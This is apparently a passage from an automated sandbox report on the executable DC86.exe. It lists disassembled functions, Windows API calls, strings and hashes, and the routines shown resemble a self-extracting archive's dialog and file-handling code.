_free.LIBCMT ref: 00A08930
_free.LIBCMT ref: 00A08943
_free.LIBCMT ref: 00A08954
_free.LIBCMT ref: 00A08965

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 900c2af2093cc7ef40fc7204bdac5b2fb2cc75b6847102cc2a9e3acc9fad3b86
Instruction ID: 8571e4775ec65aeb3a83b93cfb0bee396ea19eb187562225336c7487cc71b04f
Opcode Fuzzy Hash: 900c2af2093cc7ef40fc7204bdac5b2fb2cc75b6847102cc2a9e3acc9fad3b86
Instruction Fuzzy Hash: B8F03A7D82012B9BC606EF94FD025853FB1F7667103810706F858522F1CB7A49439B89

Function 009F15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 009F17BC
_swprintf.LIBCMT ref: 009F186B

Strings

%ls, xrefs: 009F1641, 009F1657
%s: %s, xrefs: 009F17CB

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: c0b1d5b3e5ef6850a3b031487985a564e26e943fe4af7ed814c9689099883074
Instruction ID: 17de550d0de2c9e9f5dd605df6b80436905adaddab141585cbfadeae99af0aa7
Opcode Fuzzy Hash: c0b1d5b3e5ef6850a3b031487985a564e26e943fe4af7ed814c9689099883074
Instruction Fuzzy Hash: 6C51013524830CF7F7122A948E46F3576596B05F44F244D06F39EB84E1CAA7A850BBDB

Function 00A07F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\DC86.exe,00000104), ref: 00A07FAE
_free.LIBCMT ref: 00A08079
_free.LIBCMT ref: 00A08083

Strings

C:\Users\user\Desktop\DC86.exe, xrefs: 00A07FA5, 00A07FAC, 00A07FDB, 00A08013

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\DC86.exe
API String ID: 2506810119-3833119034
Opcode ID: e068d1a400a32c95df0ff8d8417687ec188f9227ad6af85520ab28aad8342f14
Instruction ID: cb8f6fc7d35c04cff9306a9a700d7d826bd9915cb398f23c4dabc3650cca7a1b
Opcode Fuzzy Hash: e068d1a400a32c95df0ff8d8417687ec188f9227ad6af85520ab28aad8342f14
Instruction Fuzzy Hash: F031EEB5A0020DEFCB21DF99ED80A9EBBBCEF85300F10416AF84497291DB759E45CB65

Function 00A031D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00A031FB
_abort.LIBCMT ref: 00A03306

Strings

RCC, xrefs: 00A03215
MOC, xrefs: 00A0320D

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 032b9957a09c9a77d7fa5d690f291d2e00145fecf3670e695af3fc23bbd29e1f
Instruction ID: f10874b653286fccf4acb9f21904a6b21f8fbb824405e9f0ac6fe883594a38ee
Opcode Fuzzy Hash: 032b9957a09c9a77d7fa5d690f291d2e00145fecf3670e695af3fc23bbd29e1f
Instruction Fuzzy Hash: A341687290020DAFCF15DF98ED81AEEBBB9BF08304F188159F904A7291D735AA50DB51

Function 009E7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E7406

Part of subcall function 009E3BBA: __EH_prolog.LIBCMT ref: 009E3BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 009E74CD

Part of subcall function 009E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 009E7AAB
Part of subcall function 009E7A9C: GetLastError.KERNEL32 ref: 009E7AF1
Part of subcall function 009E7A9C: CloseHandle.KERNEL32(?), ref: 009E7B00

Strings

SeRestorePrivilege, xrefs: 009E7460
SeSecurityPrivilege, xrefs: 009E744B

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 98cec1e0fe125e40c405444d62be93ae0aa56849b5ee9bbc85b37382ea2f9b6e
Instruction ID: 2043731546a0f9f0e8ee2e149c8cf29f81198fbf540f214c603531df1835dae5
Opcode Fuzzy Hash: 98cec1e0fe125e40c405444d62be93ae0aa56849b5ee9bbc85b37382ea2f9b6e
Instruction Fuzzy Hash: 9B31E371D04288AADF12EBE5DC45BFEBBBDAB99300F044025F405A7192DB748E858761

Function 009FAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 009E1316: GetDlgItem.USER32(00000000,00003021), ref: 009E135A
Part of subcall function 009E1316: SetWindowTextW.USER32(00000000,00A135F4), ref: 009E1370

EndDialog.USER32(?,00000001), ref: 009FAD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 009FADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 009FADC2

Strings

ASKNEXTVOL, xrefs: 009FAD28

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: bcf03871d6460fcc05294c86529c3c5ce76d54fae1af8115ecdeed8a0dd075eb
Instruction ID: 4ed1741993592b807af49333b3ab849e08219bf71d44a8757a57244194729a6c
Opcode Fuzzy Hash: bcf03871d6460fcc05294c86529c3c5ce76d54fae1af8115ecdeed8a0dd075eb
Instruction Fuzzy Hash: C911B176280204BFD712CFA9EC85FBA376DAB8B742F000500F344DA5E0C766A9469722

Function 009ED8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 009ED954
_strncpy.LIBCMT ref: 009ED99A

Part of subcall function 009F1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00A21030,00000200,009ED928,00000000,?,00000050,00A21030), ref: 009F1DC4

Strings

@%s, xrefs: 009ED93E
$%s, xrefs: 009ED949

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 415bcb998148505192cc14d3ad1a6ec99602da5223261403812fd5ae3a4af3fc
Instruction ID: 7c243d811a320a4d5b4915a01b6106e863ed43c4aa1032dd2f27a30ce6144d89
Opcode Fuzzy Hash: 415bcb998148505192cc14d3ad1a6ec99602da5223261403812fd5ae3a4af3fc
Instruction Fuzzy Hash: 2B21A57244128CEEEF22DEB5CD41FEE7BACAF05304F040511F95096193E276DA54CB51

Function 009F0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,009EAC5A,00000008,?,00000000,?,009ED22D,?,00000000), ref: 009F0E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,009EAC5A,00000008,?,00000000,?,009ED22D,?,00000000), ref: 009F0E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,009EAC5A,00000008,?,00000000,?,009ED22D,?,00000000), ref: 009F0E9F

Strings

Thread pool initialization failed., xrefs: 009F0EB7

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: fda92d5ea379efda4923e33674f32793ae4dbdff3e23f3503f6669798fe085ee
Instruction ID: 6a265999f11d4f9919f9ab9e66419c2b1279f76c27560631fa90df6d5c4d012a
Opcode Fuzzy Hash: fda92d5ea379efda4923e33674f32793ae4dbdff3e23f3503f6669798fe085ee
Instruction Fuzzy Hash: 471151B264470C9FC3219F6A9C85AA7FBECEBA9744F104C2EF2DAC6201D67159418B54

Function 009FB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 009E1316: GetDlgItem.USER32(00000000,00003021), ref: 009E135A
Part of subcall function 009E1316: SetWindowTextW.USER32(00000000,00A135F4), ref: 009E1370

EndDialog.USER32(?,00000001), ref: 009FB2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 009FB2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 009FB304

Strings

GETPASSWORD1, xrefs: 009FB289

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: dacf51248509858fec424e253c4b4fca79c713b49345393b722a06cf5b2a6710
Instruction ID: d999933aab111beb65e7deaf0ad1cd98ab778b2e448776c9ccc351c82472920f
Opcode Fuzzy Hash: dacf51248509858fec424e253c4b4fca79c713b49345393b722a06cf5b2a6710
Instruction Fuzzy Hash: 2211ED37A40118BADB229EA4DC59FFE376CEBAA740F100421FB45B2080C7A59E4197A1

Function 009FDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 009FDD1C, 009FDD50
RENAMEDLG, xrefs: 009FDD31

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 72cebceb70b4460533d97a775e63c51175025a99ff20f6b0681d320baba5d857
Instruction ID: e3a17add1727ce2ae5afbf2a59b61260da81cdabaed47c03368093c242700d21
Opcode Fuzzy Hash: 72cebceb70b4460533d97a775e63c51175025a99ff20f6b0681d320baba5d857
Instruction Fuzzy Hash: A6019276506249AFDB20EFD8EC44ABA3BAAF799348B000435F605826B0C6359852DBA0

Function 00A09A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00A09AA9
__alldvrm.LIBCMT ref: 00A09CAA
__alldvrm.LIBCMT ref: 00A09CCC

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction ID: 8fc1d485d42d2add9f4c0f781cb203aa17cb38da63a485dcc4e1a5a29733313e
Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction Fuzzy Hash: 72A10572E0428E9FEB21CF28E8917AFBBE5EF56350F18416DE5859B2C2C2398D41C750

Function 009EA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,009E7F69,?,?,?), ref: 009EA3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,009E7F69,?), ref: 009EA43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,009E7F69,?,?,?,?,?,?,?), ref: 009EA4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,009E7F69,?,?,?,?,?,?,?,?,?,?), ref: 009EA4C6

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: eb71e956c86ce6de67a9e7bca7df42930d2d241e646965a2794a170f7abd86ae
Instruction ID: 35e00d56ad8b39bc4fd52bef5ba9ed7ea93ed83ff70d8f137798fa65f97286ed
Opcode Fuzzy Hash: eb71e956c86ce6de67a9e7bca7df42930d2d241e646965a2794a170f7abd86ae
Instruction Fuzzy Hash: 7541BE312483C1AAD722DF25DC45BAEBBE8AB84300F044919B6D1971E1D6A4AE489B53

Function 009E1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009E112B
_wcslen.LIBCMT ref: 009E1153
_wcslen.LIBCMT ref: 009E1182
_wcslen.LIBCMT ref: 009E11A9

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: d38d3069afd5f89d60943c73e643c18ea1d1219d1ed8ed12481b2e9b71a91f2b
Instruction ID: 436c0eb10f3ba972c72e46ca913a0587e575b409686bbc5cbced8ba009fc6898
Opcode Fuzzy Hash: d38d3069afd5f89d60943c73e643c18ea1d1219d1ed8ed12481b2e9b71a91f2b
Instruction Fuzzy Hash: FC41B6769006699BCB21DF68CC05AEE7BBCEF81310F000129FA45F7245DB34AE558BA4

Function 00A0C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00A091E0,?,00000000,?,00000001,?,?,00000001,00A091E0,?), ref: 00A0C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A0CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00A06CBE,?), ref: 00A0CA70
__freea.LIBCMT ref: 00A0CA79

Part of subcall function 00A08E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A0CA2C,00000000,?,00A06CBE,?,00000008,?,00A091E0,?,?,?), ref: 00A08E38

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 67d13c1d538bbd28e9fd038e58fef2eeff2ef44b80fa3a68bcc3513bc31b5430
Instruction ID: 4ae2b263017dc384a98bc15e67c143d44bf49aeab79a8c2500f1a4ca6c0dfb07
Opcode Fuzzy Hash: 67d13c1d538bbd28e9fd038e58fef2eeff2ef44b80fa3a68bcc3513bc31b5430
Instruction Fuzzy Hash: 6231AE72A0021EABDF24DF64EC95EEE7BA6EB41360B044268FC04E6290E735CD51CB90

Function 009FA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009FA666
GetDeviceCaps.GDI32(00000000,00000058), ref: 009FA675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009FA683
ReleaseDC.USER32(00000000,00000000), ref: 009FA691

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 3d6a9bd30309fb76b3f509fa873032e83fe8634d18e53996e5ca05b4de676944
Instruction ID: 2db8f6994f24017446d61f3f9b0a2461064378ae5fce18dc0bf3417360d4767e
Opcode Fuzzy Hash: 3d6a9bd30309fb76b3f509fa873032e83fe8634d18e53996e5ca05b4de676944
Instruction Fuzzy Hash: EDE0863A952721B7C720DBE46C0DB9A3E14AB96B52F100310F60595190DB6545028B90

Function 009FA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 009FA699: GetDC.USER32(00000000), ref: 009FA69D
Part of subcall function 009FA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 009FA6A8
Part of subcall function 009FA699: ReleaseDC.USER32(00000000,00000000), ref: 009FA6B3

GetObjectW.GDI32(?,00000018,?), ref: 009FA83C

Part of subcall function 009FAAC9: GetDC.USER32(00000000), ref: 009FAAD2
Part of subcall function 009FAAC9: GetObjectW.GDI32(?,00000018,?), ref: 009FAB01
Part of subcall function 009FAAC9: ReleaseDC.USER32(00000000,?), ref: 009FAB99

Strings

(, xrefs: 009FA9AA

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 0c79e6a082e8e4eb42ac012ca8bdc54a51f9c7f4fea5d1740dc855fe301415c3
Instruction ID: a0ef1ecc50ab249b276f92e308b08bd676dc2dd33768aa9dc2e4f57adc18c67d
Opcode Fuzzy Hash: 0c79e6a082e8e4eb42ac012ca8bdc54a51f9c7f4fea5d1740dc855fe301415c3
Instruction Fuzzy Hash: 109100B5608344AFDB10DF65C844A6BBBE9FFD9700F00491EF59AD3220CB71A946CB62

Function 00A0B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A0B324

Part of subcall function 00A09097: IsProcessorFeaturePresent.KERNEL32(00000017,00A09086,00000050,00A13A34,?,009ED710,00000004,00A21030,?,?,00A09093,00000000,00000000,00000000,00000000,00000000), ref: 00A09099
